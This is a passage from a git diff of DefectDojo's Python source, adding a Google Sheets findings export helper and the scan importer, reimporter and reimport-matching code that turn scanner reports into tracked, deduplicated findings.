index_of_column + 1 + }, + "properties": { + "hiddenByUser": True, + }, + "fields": "hiddenByUser" + } + }) + body["requests"].append({ + "addProtectedRange": { + "protectedRange": { + "range": { + "sheetId": sheet_id, + "startRowIndex": 1, + "endRowIndex": row_count, + "startColumnIndex": index_of_column, + "endColumnIndex": index_of_column + 1, + }, + "editors": { + "users": [ + service_account_email, + email_address + ] + }, + "warningOnly": False + } + } + }) + elif column_name[:6] == '[note]' or column_name[:11] == '[duplicate]': + body["requests"].append({ + "autoResizeDimensions": { + "dimensions": { + "sheetId": sheet_id, + "dimension": "COLUMNS", + "startIndex": index_of_column, + "endIndex": index_of_column + 1 + } + } + }) + sheets_service.spreadsheets().batchUpdate(spreadsheetId=spreadsheetId, body=body).execute() + + +def get_findings_list(tid): + test = Test.objects.get(id=tid) + system_settings = get_object_or_404(System_Settings, id=1) + findings = Finding.objects.filter(test=test).order_by('numerical_severity') + active_note_types = Note_Type.objects.filter(is_active=True).order_by('id') + note_type_activation = active_note_types.count() + + # Create the header row + fields = Finding._meta.fields + findings_list = [] + headings = [] + for i in fields: + headings.append(i.name) + findings_list.append(headings) + + # Create finding rows + for finding in findings: + finding_details = [] + for field in fields: + value = getattr(finding, field.name) + if type(value) == datetime.date or type(value) == Test or type(value) == datetime.datetime: + var = str(value) + elif type(value) == User or type(value) == Dojo_User: + var = value.username + elif type(value) == Finding: + var = value.id + elif type(value) == Sonarqube_Issue: + var = value.key + else: + var = value + finding_details.append(var) + findings_list.append(finding_details) + + # Add notes into the findings_list + if note_type_activation: + for note_type in active_note_types: + max_note_count = 1 + if note_type.is_single: + findings_list[0].append('[note] ' + note_type.name + '_1_id') + findings_list[0].append('[note] ' + note_type.name + '_1') + else: + for finding in findings: + note_count = finding.notes.filter(note_type=note_type).count() + if max_note_count < note_count: + max_note_count = note_count + for n in range(max_note_count): + findings_list[0].append('[note] ' + note_type.name + '_' + str(n + 1) + '_id') + findings_list[0].append('[note] ' + note_type.name + '_' + str(n + 1)) + for f in range(findings.count()): + finding = findings[f] + notes = finding.notes.filter(note_type=note_type).order_by('id') + for note in notes: + findings_list[f + 1].append(note.id) + findings_list[f + 1].append(note.entry) + missing_notes_count = max_note_count - notes.count() + for i in range(missing_notes_count): + findings_list[f + 1].append('') + findings_list[f + 1].append('') + max_note_count = 0 + for finding in findings: + note_count = finding.notes.exclude(note_type__in=active_note_types).count() + if max_note_count < note_count: + max_note_count = note_count + if max_note_count > 0: + for i in range(max_note_count): + findings_list[0].append('[note] ' + "Note_" + str(i + 1) + '_id') + findings_list[0].append('[note] ' + "Note_" + str(i + 1)) + for f in range(findings.count()): + finding = findings[f] + notes = finding.notes.exclude(note_type__in=active_note_types).order_by('id') + for note in notes: + findings_list[f + 1].append(note.id) + findings_list[f + 1].append(note.entry) + missing_notes_count = max_note_count - notes.count() + for i in range(missing_notes_count): + findings_list[f + 1].append('') + findings_list[f + 1].append('') + else: + max_note_count = 1 + for finding in findings: + note_count = len(finding.notes.all()) + if note_count > max_note_count: + max_note_count = note_count + for i in range(max_note_count): + findings_list[0].append('[note] ' + "Note_" + str(i + 1) + '_id') + findings_list[0].append('[note] ' + "Note_" + str(i + 1)) + for f in range(findings.count()): + finding = findings[f] + notes = finding.notes.all().order_by('id') + for note in notes: + findings_list[f + 1].append(note.id) + findings_list[f + 1].append(note.entry) + missing_notes_count = max_note_count - notes.count() + for i in range(missing_notes_count): + findings_list[f + 1].append('') + findings_list[f + 1].append('') + + if system_settings.enable_deduplication: + if note_type_activation: + for note_type in active_note_types: + findings_list[0].append('[duplicate] ' + note_type.name) + for f in range(findings.count()): + original_finding = findings[f].duplicate_finding + for note_type in active_note_types: + try: + note = original_finding.notes.filter(note_type=note_type).latest('date') + findings_list[f + 1].append(note.entry) + except: + findings_list[f + 1].append('') + else: + findings_list[0].append('[duplicate] note') + for f in range(findings.count()): + original_finding = findings[f].duplicate_finding + try: + note = original_finding.notes.latest('date') + findings_list[f + 1].append(note.entry) + except: + findings_list[f + 1].append('') + + findings_list[0].append('Last column') + for f in range(findings.count()): + findings_list[f + 1].append('-') + return findings_list diff --git a/dojo/importers/importer/importer.py b/dojo/importers/importer/importer.py new file mode 100644 index 00000000000..e1494576eb4 --- /dev/null +++ b/dojo/importers/importer/importer.py @@ -0,0 +1,355 @@ +import base64 + +from django.db.models.query_utils import Q +from dojo.importers import utils as importer_utils +from dojo.decorators import dojo_async_task +from dojo.utils import get_current_user, is_finding_groups_enabled +from dojo.celery import app +from django.core.exceptions import ValidationError +from django.core import serializers +import dojo.finding.helper as finding_helper +import dojo.jira_link.helper as jira_helper +import dojo.notifications.helper as notifications_helper +from django.conf import settings +from django.core.files.base import ContentFile +from django.utils import timezone +from dojo.models import (BurpRawRequestResponse, FileUpload, + Finding, Test, Test_Import, Test_Type) +from dojo.tools.factory import get_parser +import logging + + +logger = logging.getLogger(__name__) +deduplicationLogger = logging.getLogger("dojo.specific-loggers.deduplication") + + +class DojoDefaultImporter(object): + + def create_test(self, scan_type, test_type_name, engagement, lead, environment, tags=None, + scan_date=None, version=None, branch_tag=None, build_id=None, commit_hash=None, now=timezone.now(), + api_scan_configuration=None, title=None): + + test_type, created = Test_Type.objects.get_or_create( + name=test_type_name) + + if created: + logger.info('Created new Test_Type with name %s because a report is being imported', test_type.name) + + test = Test( + title=title, + engagement=engagement, + lead=lead, + test_type=test_type, + scan_type=scan_type, + target_start=scan_date if scan_date else now.date(), + target_end=scan_date if scan_date else now.date(), + environment=environment, + percent_complete=100, + version=version, + branch_tag=branch_tag, + build_id=build_id, + commit_hash=commit_hash, + api_scan_configuration=api_scan_configuration, + tags=tags, + ) + + test.full_clean() + test.save() + return test + + @dojo_async_task + @app.task(ignore_result=False) + def process_parsed_findings(self, test, parsed_findings, scan_type, user, active, verified, minimum_severity=None, + endpoints_to_add=None, push_to_jira=None, group_by=None, now=timezone.now(), service=None, scan_date=None, **kwargs): + logger.debug('endpoints_to_add: %s', endpoints_to_add) + new_findings = [] + items = parsed_findings + logger.debug('starting import of %i items.', len(items) if items else 0) + i = 0 + for item in items: + # FIXME hack to remove when all parsers have unit tests for this attribute + if item.severity.lower().startswith('info') and item.severity != 'Info': + item.severity = 'Info' + + item.numerical_severity = Finding.get_numerical_severity(item.severity) + + if minimum_severity and (Finding.SEVERITIES[item.severity] > + Finding.SEVERITIES[minimum_severity]): + # finding's severity is below the configured threshold : ignoring the finding + continue + + item.test = test + item.reporter = user if user else get_current_user + item.last_reviewed = now + item.last_reviewed_by = user if user else get_current_user + + logger.debug('process_parsed_findings: active from report: %s, verified from report: %s', item.active, item.verified) + # active, verified parameters = parameters from the gui or api call. + # item.active, item.verified = values from the report / the parser + # if either value of active (from the parser or from the api/gui) is false, final status is inactive + # else final status is active + # if either value of verified (from the parser or from the api/gui) is false, final status is not verified + # else final status is verified + # Note that: + # - the API (active/verified parameters) values default to True if not specified + # - the parser values default to true if not set by the parser (as per the default value in models.py) + # - there is no "not specified" in the GUI (not ticked means not active/not verified) + if item.active: + item.active = active + if item.verified: + item.verified = verified + + # if scan_date was provided, override value from parser + if scan_date: + item.date = scan_date.date() + + if service: + item.service = service + + item.save(dedupe_option=False) + + if is_finding_groups_enabled() and group_by: + finding_helper.add_finding_to_auto_group(item, group_by, **kwargs) + + if (hasattr(item, 'unsaved_req_resp') and + len(item.unsaved_req_resp) > 0): + for req_resp in item.unsaved_req_resp: + burp_rr = BurpRawRequestResponse( + finding=item, + burpRequestBase64=base64.b64encode(req_resp["req"].encode("utf-8")), + burpResponseBase64=base64.b64encode(req_resp["resp"].encode("utf-8"))) + burp_rr.clean() + burp_rr.save() + + if (item.unsaved_request is not None and + item.unsaved_response is not None): + burp_rr = BurpRawRequestResponse( + finding=item, + burpRequestBase64=base64.b64encode(item.unsaved_request.encode()), + burpResponseBase64=base64.b64encode(item.unsaved_response.encode())) + burp_rr.clean() + burp_rr.save() + + if settings.ASYNC_FINDING_IMPORT: + importer_utils.chunk_endpoints_and_disperse(item, test, item.unsaved_endpoints) + else: + importer_utils.add_endpoints_to_unsaved_finding(item, test, item.unsaved_endpoints, sync=True) + + if endpoints_to_add: + if settings.ASYNC_FINDING_IMPORT: + importer_utils.chunk_endpoints_and_disperse(item, test, endpoints_to_add) + else: + importer_utils.add_endpoints_to_unsaved_finding(item, test, endpoints_to_add, sync=True) + + if item.unsaved_tags: + item.tags = item.unsaved_tags + + if item.unsaved_files: + for unsaved_file in item.unsaved_files: + data = base64.b64decode(unsaved_file.get('data')) + title = unsaved_file.get('title', '') + file_upload, file_upload_created = FileUpload.objects.get_or_create( + title=title, + ) + file_upload.file.save(title, ContentFile(data)) + file_upload.save() + item.files.add(file_upload) + + importer_utils.handle_vulnerability_ids(item) + + new_findings.append(item) + # to avoid pushing a finding group multiple times, we push those outside of the loop + if is_finding_groups_enabled() and item.finding_group: + item.save() + else: + item.save(push_to_jira=push_to_jira) + + if is_finding_groups_enabled() and push_to_jira: + for finding_group in set([finding.finding_group for finding in new_findings if finding.finding_group is not None]): + jira_helper.push_to_jira(finding_group) + sync = kwargs.get('sync', False) + if not sync: + return [serializers.serialize('json', [finding, ]) for finding in new_findings] + return new_findings + + def close_old_findings(self, test, scan_date_time, user, push_to_jira=None, service=None): + old_findings = [] + # Close old active findings that are not reported by this scan. + new_hash_codes = test.finding_set.values('hash_code') + + # TODO I don't think these criteria are 100% correct, why are findings with the same hash_code excluded? + # Would it make more sense to exclude duplicates? But the deduplication process can be unfinished because it's + # run in a celery async task... + if test.engagement.deduplication_on_engagement: + old_findings = Finding.objects.exclude(test=test) \ + .exclude(hash_code__in=new_hash_codes) \ + .filter(test__engagement=test.engagement, + test__test_type=test.test_type, + active=True) + else: + # TODO BUG? this will violate the deduplication_on_engagement setting for other engagements + old_findings = Finding.objects.exclude(test=test) \ + .exclude(hash_code__in=new_hash_codes) \ + .filter(test__engagement__product=test.engagement.product, + test__test_type=test.test_type, + active=True) + + if service: + old_findings = old_findings.filter(service=service) + else: + old_findings = old_findings.filter(Q(service__isnull=True) | Q(service__exact='')) + + for old_finding in old_findings: + old_finding.active = False + old_finding.is_mitigated = True + old_finding.mitigated = scan_date_time + old_finding.notes.create(author=user, + entry="This finding has been automatically closed" + " as it is not present anymore in recent scans.") + endpoint_status = old_finding.endpoint_status.all() + for status in endpoint_status: + status.mitigated_by = user + status.mitigated_time = timezone.now() + status.mitigated = True + status.last_modified = timezone.now() + status.save() + + old_finding.tags.add('stale') + + # to avoid pushing a finding group multiple times, we push those outside of the loop + if is_finding_groups_enabled() and old_finding.finding_group: + # don't try to dedupe findings that we are closing + old_finding.save(dedupe_option=False) + else: + old_finding.save(dedupe_option=False, push_to_jira=push_to_jira) + + if is_finding_groups_enabled() and push_to_jira: + for finding_group in set([finding.finding_group for finding in old_findings if finding.finding_group is not None]): + jira_helper.push_to_jira(finding_group) + + return old_findings + + def import_scan(self, scan, scan_type, engagement, lead, environment, active, verified, tags=None, minimum_severity=None, + user=None, endpoints_to_add=None, scan_date=None, version=None, branch_tag=None, build_id=None, + commit_hash=None, push_to_jira=None, close_old_findings=False, group_by=None, api_scan_configuration=None, + service=None, title=None): + + logger.debug(f'IMPORT_SCAN: parameters: {locals()}') + + user = user or get_current_user() + + now = timezone.now() + + if api_scan_configuration and api_scan_configuration.product != engagement.product: + raise ValidationError('API Scan Configuration has to be from same product as the Engagement') + + # check if the parser that handle the scan_type manage tests + # if yes, we parse the data first + # after that we customize the Test_Type to reflect the data + # This allow us to support some meta-formats like SARIF or the generic format + parser = get_parser(scan_type) + if hasattr(parser, 'get_tests'): + logger.debug('IMPORT_SCAN parser v2: Create Test and parse findings') + tests = parser.get_tests(scan_type, scan) + # for now we only consider the first test in the list and artificially aggregate all findings of all tests + # this is the same as the old behavior as current import/reimporter implementation doesn't handle the case + # when there is more than 1 test + # + # we also aggregate the label of the Test_type to show the user the original scan_type + # only if they are different. This is to support meta format like SARIF + # so a report that have the label 'CodeScanner' will be changed to 'CodeScanner Scan (SARIF)' + test_type_name = scan_type + if len(tests) > 0: + if tests[0].type: + test_type_name = tests[0].type + " Scan" + if test_type_name != scan_type: + test_type_name = f"{test_type_name} ({scan_type})" + + test = self.create_test(scan_type, test_type_name, engagement, lead, environment, scan_date=scan_date, tags=tags, + version=version, branch_tag=branch_tag, build_id=build_id, commit_hash=commit_hash, now=now, + api_scan_configuration=api_scan_configuration, title=title) + # This part change the name of the Test + # we get it from the data of the parser + test_raw = tests[0] + if test_raw.name: + test.name = test_raw.name + if test_raw.description: + test.description = test_raw.description + test.save() + + logger.debug('IMPORT_SCAN parser v2: Parse findings (aggregate)') + # currently we only support import one Test + # so for parser that support multiple tests (like SARIF) + # we aggregate all the findings into one uniq test + parsed_findings = [] + for test_raw in tests: + parsed_findings.extend(test_raw.findings) + else: + logger.info(f'No tests found in import for {scan_type}') + else: + logger.debug('IMPORT_SCAN: Create Test') + # by default test_type == scan_type + test = self.create_test(scan_type, scan_type, engagement, lead, environment, scan_date=scan_date, tags=tags, + version=version, branch_tag=branch_tag, build_id=build_id, commit_hash=commit_hash, now=now, + api_scan_configuration=api_scan_configuration, title=title) + + logger.debug('IMPORT_SCAN: Parse findings') + parser = get_parser(scan_type) + parsed_findings = parser.get_findings(scan, test) + + logger.debug('IMPORT_SCAN: Processing findings') + new_findings = [] + if settings.ASYNC_FINDING_IMPORT: + chunk_list = importer_utils.chunk_list(parsed_findings) + results_list = [] + # First kick off all the workers + for findings_list in chunk_list: + result = self.process_parsed_findings(test, findings_list, scan_type, user, active, + verified, minimum_severity=minimum_severity, + endpoints_to_add=endpoints_to_add, push_to_jira=push_to_jira, + group_by=group_by, now=now, service=service, scan_date=scan_date, sync=False) + # Since I dont want to wait until the task is done right now, save the id + # So I can check on the task later + results_list += [result] + # After all tasks have been started, time to pull the results + logger.info('IMPORT_SCAN: Collecting Findings') + for results in results_list: + serial_new_findings = results.get() + new_findings += [next(serializers.deserialize("json", finding)).object for finding in serial_new_findings] + logger.info('IMPORT_SCAN: All Findings Collected') + # Indicate that the test is not complete yet as endpoints will still be rolling in. + test.percent_complete = 50 + test.save() + else: + new_findings = self.process_parsed_findings(test, parsed_findings, scan_type, user, active, + verified, minimum_severity=minimum_severity, + endpoints_to_add=endpoints_to_add, push_to_jira=push_to_jira, + group_by=group_by, now=now, service=service, scan_date=scan_date, sync=True) + + closed_findings = [] + if close_old_findings: + logger.debug('IMPORT_SCAN: Closing findings no longer present in scan report') + closed_findings = self.close_old_findings(test, scan_date, user=user, push_to_jira=push_to_jira, service=service) + + logger.debug('IMPORT_SCAN: Updating test/engagement timestamps') + importer_utils.update_timestamps(test, version, branch_tag, build_id, commit_hash, now, scan_date) + + test_import = None + if settings.TRACK_IMPORT_HISTORY: + logger.debug('IMPORT_SCAN: Updating Import History') + test_import = importer_utils.update_import_history(Test_Import.IMPORT_TYPE, active, verified, tags, minimum_severity, + endpoints_to_add, version, branch_tag, build_id, commit_hash, + push_to_jira, close_old_findings, test, new_findings, closed_findings) + + logger.debug('IMPORT_SCAN: Generating notifications') + notifications_helper.notify_test_created(test) + updated_count = len(new_findings) + len(closed_findings) + if updated_count > 0: + notifications_helper.notify_scan_added(test, updated_count, new_findings=new_findings, findings_mitigated=closed_findings) + + logger.debug('IMPORT_SCAN: Updating Test progress') + importer_utils.update_test_progress(test) + + logger.debug('IMPORT_SCAN: Done') + + return test, len(new_findings), len(closed_findings), test_import diff --git a/dojo/importers/reimporter/reimporter.py b/dojo/importers/reimporter/reimporter.py new file mode 100644 index 00000000000..2a400e410c3 --- /dev/null +++ b/dojo/importers/reimporter/reimporter.py @@ -0,0 +1,372 @@ +import base64 +import logging + +import dojo.finding.helper as finding_helper +import dojo.jira_link.helper as jira_helper +import dojo.notifications.helper as notifications_helper +from dojo.decorators import dojo_async_task +from dojo.celery import app +from django.conf import settings +from django.core.exceptions import ValidationError +from django.core import serializers +from django.core.files.base import ContentFile +from django.utils import timezone +from dojo.importers import utils as importer_utils +from dojo.models import (BurpRawRequestResponse, FileUpload, Finding, + Notes, Test_Import) +from dojo.tools.factory import get_parser +from dojo.utils import get_current_user, is_finding_groups_enabled +from django.db.models import Q + +logger = logging.getLogger(__name__) +deduplicationLogger = logging.getLogger("dojo.specific-loggers.deduplication") + + +class DojoDefaultReImporter(object): + + @dojo_async_task + @app.task(ignore_result=False) + def process_parsed_findings(self, test, parsed_findings, scan_type, user, active, verified, minimum_severity=None, + endpoints_to_add=None, push_to_jira=None, group_by=None, now=timezone.now(), service=None, scan_date=None, **kwargs): + + items = parsed_findings + original_items = list(test.finding_set.all()) + new_items = [] + mitigated_count = 0 + finding_count = 0 + finding_added_count = 0 + reactivated_count = 0 + reactivated_items = [] + unchanged_count = 0 + unchanged_items = [] + + logger.debug('starting reimport of %i items.', len(items) if items else 0) + from dojo.importers.reimporter.utils import ( + match_new_finding_to_existing_finding, + update_endpoint_status, + reactivate_endpoint_status) + deduplication_algorithm = test.deduplication_algorithm + + i = 0 + logger.debug('STEP 1: looping over findings from the reimported report and trying to match them to existing findings') + deduplicationLogger.debug('Algorithm used for matching new findings to existing findings: %s', deduplication_algorithm) + for item in items: + # FIXME hack to remove when all parsers have unit tests for this attribute + if item.severity.lower().startswith('info') and item.severity != 'Info': + item.severity = 'Info' + + item.numerical_severity = Finding.get_numerical_severity(item.severity) + + if minimum_severity and (Finding.SEVERITIES[item.severity] > Finding.SEVERITIES[minimum_severity]): + # finding's severity is below the configured threshold : ignoring the finding + continue + + # existing findings may be from before we had component_name/version fields + component_name = item.component_name if hasattr(item, 'component_name') else None + component_version = item.component_version if hasattr(item, 'component_version') else None + + if not hasattr(item, 'test'): + item.test = test + + item.service = service + + item.hash_code = item.compute_hash_code() + deduplicationLogger.debug("item's hash_code: %s", item.hash_code) + + findings = match_new_finding_to_existing_finding(item, test, deduplication_algorithm) + + deduplicationLogger.debug('found %i findings matching with current new finding', len(findings)) + + if findings: + # existing finding found + finding = findings[0] + if finding.false_p or finding.out_of_scope or finding.risk_accepted: + logger.debug('%i: skipping existing finding (it is marked as false positive:%s and/or out of scope:%s or is a risk accepted:%s): %i:%s:%s:%s', i, finding.false_p, finding.out_of_scope, finding.risk_accepted, finding.id, finding, finding.component_name, finding.component_version) + elif finding.mitigated or finding.is_mitigated: + logger.debug('%i: reactivating: %i:%s:%s:%s', i, finding.id, finding, finding.component_name, finding.component_version) + finding.mitigated = None + finding.is_mitigated = False + finding.mitigated_by = None + finding.active = True + finding.verified = verified + + # existing findings may be from before we had component_name/version fields + finding.component_name = finding.component_name if finding.component_name else component_name + finding.component_version = finding.component_version if finding.component_version else component_version + + # don't dedupe before endpoints are added + finding.save(dedupe_option=False) + note = Notes( + entry="Re-activated by %s re-upload." % scan_type, + author=user) + note.save() + + endpoint_statuses = finding.endpoint_status.exclude(Q(false_positive=True) | + Q(out_of_scope=True) | + Q(risk_accepted=True)) + + # Determine if this can be run async + if settings.ASYNC_FINDING_IMPORT: + chunk_list = importer_utils.chunk_list(endpoint_statuses) + # If there is only one chunk, then do not bother with async + if len(chunk_list) < 2: + reactivate_endpoint_status(endpoint_statuses, sync=True) + logger.debug('IMPORT_SCAN: Split endpoints into ' + str(len(chunk_list)) + ' chunks of ' + str(chunk_list[0])) + # First kick off all the workers + for endpoint_status_list in chunk_list: + reactivate_endpoint_status(endpoint_status_list, sync=False) + else: + reactivate_endpoint_status(endpoint_statuses, sync=True) + + finding.notes.add(note) + reactivated_items.append(finding) + reactivated_count += 1 + else: + # existing findings may be from before we had component_name/version fields + logger.debug('%i: updating existing finding: %i:%s:%s:%s', i, finding.id, finding, finding.component_name, finding.component_version) + if not finding.component_name or not finding.component_version: + finding.component_name = finding.component_name if finding.component_name else component_name + finding.component_version = finding.component_version if finding.component_version else component_version + finding.save(dedupe_option=False) + + # if finding is the same but list of affected was changed, finding is marked as unchanged. This is a known issue + unchanged_items.append(finding) + unchanged_count += 1 + if finding.dynamic_finding: + logger.debug("Re-import found an existing dynamic finding for this new finding. Checking the status of endpoints") + update_endpoint_status(finding, item, user) + else: + # no existing finding found + item.reporter = user + item.last_reviewed = timezone.now() + item.last_reviewed_by = user + item.verified = verified + item.active = active + + # if scan_date was provided, override value from parser + if scan_date: + item.date = scan_date.date() + + # Save it. Don't dedupe before endpoints are added. + item.save(dedupe_option=False) + logger.debug('%i: reimport created new finding as no existing finding match: %i:%s:%s:%s', i, item.id, item, item.component_name, item.component_version) + + # only new items get auto grouped to avoid confusion around already existing items that are already grouped + if is_finding_groups_enabled() and group_by: + finding_helper.add_finding_to_auto_group(item, group_by, **kwargs) + + finding_added_count += 1 + new_items.append(item) + finding = item + + if hasattr(item, 'unsaved_req_resp'): + for req_resp in item.unsaved_req_resp: + burp_rr = BurpRawRequestResponse( + finding=finding, + burpRequestBase64=base64.b64encode(req_resp["req"].encode("utf-8")), + burpResponseBase64=base64.b64encode(req_resp["resp"].encode("utf-8"))) + burp_rr.clean() + burp_rr.save() + + if item.unsaved_request and item.unsaved_response: + burp_rr = BurpRawRequestResponse( + finding=finding, + burpRequestBase64=base64.b64encode(item.unsaved_request.encode()), + burpResponseBase64=base64.b64encode(item.unsaved_response.encode())) + burp_rr.clean() + burp_rr.save() + + # for existing findings: make sure endpoints are present or created + if finding: + finding_count += 1 + if settings.ASYNC_FINDING_IMPORT: + importer_utils.chunk_endpoints_and_disperse(finding, test, item.unsaved_endpoints) + else: + importer_utils.add_endpoints_to_unsaved_finding(finding, test, item.unsaved_endpoints, sync=True) + + if endpoints_to_add: + if settings.ASYNC_FINDING_IMPORT: + importer_utils.chunk_endpoints_and_disperse(finding, test, endpoints_to_add) + else: + importer_utils.add_endpoints_to_unsaved_finding(finding, test, endpoints_to_add, sync=True) + + if item.unsaved_tags: + finding.tags = item.unsaved_tags + + if item.unsaved_files: + for unsaved_file in item.unsaved_files: + data = base64.b64decode(unsaved_file.get('data')) + title = unsaved_file.get('title', '') + file_upload, file_upload_created = FileUpload.objects.get_or_create( + title=title, + ) + file_upload.file.save(title, ContentFile(data)) + file_upload.save() + finding.files.add(file_upload) + + importer_utils.handle_vulnerability_ids(finding) + + # existing findings may be from before we had component_name/version fields + finding.component_name = finding.component_name if finding.component_name else component_name + finding.component_version = finding.component_version if finding.component_version else component_version + + # finding = new finding or existing finding still in the upload report + # to avoid pushing a finding group multiple times, we push those outside of the loop + if is_finding_groups_enabled() and finding.finding_group: + finding.save() + else: + finding.save(push_to_jira=push_to_jira) + + to_mitigate = set(original_items) - set(reactivated_items) - set(unchanged_items) + # due to #3958 we can have duplicates inside the same report + # this could mean that a new finding is created and right after + # that it is detected as the 'matched existing finding' for a + # following finding in the same report + # this means untouched can have this finding inside it, + # while it is in fact a new finding. So we substract new_items + untouched = set(unchanged_items) - set(to_mitigate) - set(new_items) + + if is_finding_groups_enabled() and push_to_jira: + for finding_group in set([finding.finding_group for finding in reactivated_items + unchanged_items + new_items if finding.finding_group is not None]): + jira_helper.push_to_jira(finding_group) + sync = kwargs.get('sync', False) + if not sync: + serialized_new_items = [serializers.serialize('json', [finding, ]) for finding in new_items] + serialized_reactivated_items = [serializers.serialize('json', [finding, ]) for finding in reactivated_items] + serialized_to_mitigate = [serializers.serialize('json', [finding, ]) for finding in to_mitigate] + serialized_untouched = [serializers.serialize('json', [finding, ]) for finding in untouched] + return serialized_new_items, serialized_reactivated_items, serialized_to_mitigate, serialized_untouched + + return new_items, reactivated_items, to_mitigate, untouched + + def close_old_findings(self, test, to_mitigate, scan_date_time, user, push_to_jira=None): + logger.debug('IMPORT_SCAN: Closing findings no longer present in scan report') + mitigated_findings = [] + for finding in to_mitigate: + if not finding.mitigated or not finding.is_mitigated: + logger.debug('mitigating finding: %i:%s', finding.id, finding) + finding.mitigated = scan_date_time + finding.is_mitigated = True + finding.mitigated_by = user + finding.active = False + + endpoint_status = finding.endpoint_status.all() + for status in endpoint_status: + status.mitigated_by = user + status.mitigated_time = timezone.now() + status.mitigated = True + status.last_modified = timezone.now() + status.save() + + # to avoid pushing a finding group multiple times, we push those outside of the loop + if is_finding_groups_enabled() and finding.finding_group: + # don't try to dedupe findings that we are closing + finding.save(dedupe_option=False) + else: + finding.save(push_to_jira=push_to_jira, dedupe_option=False) + + note = Notes(entry="Mitigated by %s re-upload." % test.test_type, + author=user) + note.save() + finding.notes.add(note) + mitigated_findings.append(finding) + + if is_finding_groups_enabled() and push_to_jira: + for finding_group in set([finding.finding_group for finding in to_mitigate if finding.finding_group is not None]): + jira_helper.push_to_jira(finding_group) + + return mitigated_findings + + def reimport_scan(self, scan, scan_type, test, active=True, verified=True, tags=None, minimum_severity=None, + user=None, endpoints_to_add=None, scan_date=None, version=None, branch_tag=None, build_id=None, + commit_hash=None, push_to_jira=None, close_old_findings=True, group_by=None, api_scan_configuration=None, + service=None): + + logger.debug(f'REIMPORT_SCAN: parameters: {locals()}') + + user = user or get_current_user() + + now = timezone.now() + + if api_scan_configuration: + if api_scan_configuration.product != test.engagement.product: + raise ValidationError('API Scan Configuration has to be from same product as the Test') + if test.api_scan_configuration != api_scan_configuration: + test.api_scan_configuration = api_scan_configuration + test.save() + + # check if the parser that handle the scan_type manage tests + parser = get_parser(scan_type) + if hasattr(parser, 'get_tests'): + logger.debug('REIMPORT_SCAN parser v2: Create parse findings') + tests = parser.get_tests(scan_type, scan) + # for now we only consider the first test in the list and artificially aggregate all findings of all tests + # this is the same as the old behavior as current import/reimporter implementation doesn't handle the case + # when there is more than 1 test + parsed_findings = [] + for test_raw in tests: + parsed_findings.extend(test_raw.findings) + else: + logger.debug('REIMPORT_SCAN: Parse findings') + parsed_findings = parser.get_findings(scan, test) + + logger.debug('REIMPORT_SCAN: Processing findings') + new_findings = [] + reactivated_findings = [] + findings_to_mitigate = [] + untouched_findings = [] + if settings.ASYNC_FINDING_IMPORT: + chunk_list = importer_utils.chunk_list(parsed_findings) + results_list = [] + # First kick off all the workers + for findings_list in chunk_list: + result = self.process_parsed_findings(test, findings_list, scan_type, user, active, verified, + minimum_severity=minimum_severity, endpoints_to_add=endpoints_to_add, + push_to_jira=push_to_jira, group_by=group_by, now=now, service=service, scan_date=scan_date, sync=False) + # Since I dont want to wait until the task is done right now, save the id + # So I can check on the task later + results_list += [result] + # After all tasks have been started, time to pull the results + logger.debug('REIMPORT_SCAN: Collecting Findings') + for results in results_list: + serial_new_findings, serial_reactivated_findings, serial_findings_to_mitigate, serial_untouched_findings = results.get() + new_findings += [next(serializers.deserialize("json", finding)).object for finding in serial_new_findings] + reactivated_findings += [next(serializers.deserialize("json", finding)).object for finding in serial_reactivated_findings] + findings_to_mitigate += [next(serializers.deserialize("json", finding)).object for finding in serial_findings_to_mitigate] + untouched_findings += [next(serializers.deserialize("json", finding)).object for finding in serial_untouched_findings] + logger.debug('REIMPORT_SCAN: All Findings Collected') + # Indicate that the test is not complete yet as endpoints will still be rolling in. + test.percent_complete = 50 + test.save() + importer_utils.update_test_progress(test) + else: + new_findings, reactivated_findings, findings_to_mitigate, untouched_findings = \ + self.process_parsed_findings(test, parsed_findings, scan_type, user, active, verified, + minimum_severity=minimum_severity, endpoints_to_add=endpoints_to_add, + push_to_jira=push_to_jira, group_by=group_by, now=now, service=service, scan_date=scan_date, sync=True) + + closed_findings = [] + if close_old_findings: + logger.debug('REIMPORT_SCAN: Closing findings no longer present in scan report') + closed_findings = self.close_old_findings(test, findings_to_mitigate, scan_date, user=user, push_to_jira=push_to_jira) + + logger.debug('REIMPORT_SCAN: Updating test/engagement timestamps') + importer_utils.update_timestamps(test, version, branch_tag, build_id, commit_hash, now, scan_date) + + test_import = None + if settings.TRACK_IMPORT_HISTORY: + logger.debug('REIMPORT_SCAN: Updating Import History') + test_import = importer_utils.update_import_history(Test_Import.REIMPORT_TYPE, active, verified, tags, minimum_severity, endpoints_to_add, + version, branch_tag, build_id, commit_hash, push_to_jira, close_old_findings, + test, new_findings, closed_findings, reactivated_findings, untouched_findings) + + logger.debug('REIMPORT_SCAN: Generating notifications') + + updated_count = len(closed_findings) + len(reactivated_findings) + len(new_findings) + if updated_count > 0: + notifications_helper.notify_scan_added(test, updated_count, new_findings=new_findings, findings_mitigated=closed_findings, + findings_reactivated=reactivated_findings, findings_untouched=untouched_findings) + + logger.debug('REIMPORT_SCAN: Done') + + return test, updated_count, len(new_findings), len(closed_findings), len(reactivated_findings), len(untouched_findings), test_import diff --git a/dojo/importers/reimporter/utils.py b/dojo/importers/reimporter/utils.py new file mode 100644 index 00000000000..a74092b62ba --- /dev/null +++ b/dojo/importers/reimporter/utils.py @@ -0,0 +1,217 @@ +from datetime import timedelta +from crum import get_current_user +from django.conf import settings +from dojo.importers import utils as importer_utils +from dojo.models import Engagement, Finding, Q, Product, Product_Member, Product_Type, Product_Type_Member, Role, Test +from django.utils import timezone +from dojo.decorators import dojo_async_task +from dojo.celery import app +import logging +from dojo.utils import get_last_object_or_none, get_object_or_none + + +logger = logging.getLogger(__name__) +deduplicationLogger = logging.getLogger("dojo.specific-loggers.deduplication") + +""" +Common code for reimporting from APIV2 or from the GUI +""" + + +def match_new_finding_to_existing_finding(new_finding, test, deduplication_algorithm): + # This code should match the logic used for deduplication out of the re-import feature. + # See utils.py deduplicate_* functions + deduplicationLogger.debug('return findings bases on algorithm: %s', deduplication_algorithm) + if deduplication_algorithm == 'hash_code': + return Finding.objects.filter( + test=test, + hash_code=new_finding.hash_code).exclude( + hash_code=None).order_by('id') + elif deduplication_algorithm == 'unique_id_from_tool': + return Finding.objects.filter( + test=test, + unique_id_from_tool=new_finding.unique_id_from_tool).exclude( + unique_id_from_tool=None).order_by('id') + elif deduplication_algorithm == 'unique_id_from_tool_or_hash_code': + query = Finding.objects.filter( + Q(test=test), + (Q(hash_code__isnull=False) & 